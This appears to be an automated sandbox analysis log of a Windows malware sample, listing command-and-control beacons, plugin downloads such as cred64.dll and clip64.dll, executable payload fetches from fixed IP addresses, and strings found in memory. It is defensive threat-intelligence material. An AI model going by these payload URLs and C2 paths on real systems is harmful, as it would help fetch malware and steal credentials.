                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.56
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeCode function: 0_2_00B8D8D0 recv,recv,recv,recv,0_2_00B8D8D0
                              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                              Source: global trafficHTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=480920124&timestamp=1713490161736 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jRQWsnrOSN4; VISITOR_INFO1_LIVE=uxbWyiEqJyc; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D
                              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
                              Source: global trafficHTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
                              Source: global trafficHTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
                              Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountfmF( equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountp equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKJqaiC2kMEiuCgpI4CDA9zdQR9Ma_4VO4V4SsWE5FBoZnSBBlUHdjOISz2jXF92hxTK-U9yBg equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
                              Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKLYPILSqGGJxF99XUM7ry_ZpWfAteaIP49LuGs_pX6vyTY-I4NhOGVeIl3pV2a7zJNZmB6a&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-284379341%3A1713490158071679&theme=mn&ddm=0 equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237599781.0000000003FB4000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3207722657.0000000003FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountA equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountL equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountM) equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountT) equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000002F.00000003.3477995978.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account[C equals www.youtube.com (Youtube)
                              Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountd* equals www.youtube.com (Youtube)
                              Source: unknownDNS traffic detected: queries for: www.youtube.com
                              Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 927sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"Content-Type: text/plain;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Goog-AuthUser: 0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://accounts.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=513=DL6Us8jAPrwCCKarlTw2RsBHsg-PZZE0_IVMLOmld8Vg4EMZhTyE_65f9B0OK-p44_4Uk-puC2a1J_sCfoJnyAtSeJNyRbiKB8AiKkQJAbADm2J1hujbY6LjrFBfHJLMH2_5Lm7sfqr7tbq8PbRvtYkxosEGP0PKBUVLfjHGngA
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe0.1
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exeero
                              Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exerisepro
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe.eR
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe/
                              Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
                              Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
                              Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1E
                              Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1ame=
                              Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.56/esI
                              Source: powershell.exe, 0000000B.00000002.2810399931.0000029EFCB80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                              Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                              Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.3611100512.0000014EAB782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dvwmczhfksazn5mwlykzsdqv6u_2024.3.27.0/go
                              Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/dvwmczhfksazn5mwlykzsdqv6u_2024.3.27.0
                              Source: svchost.exe, 00000012.00000003.2839947296.0000014EAB780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                              Source: powershell.exe, 0000000B.00000002.2803800897.0000029E9006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
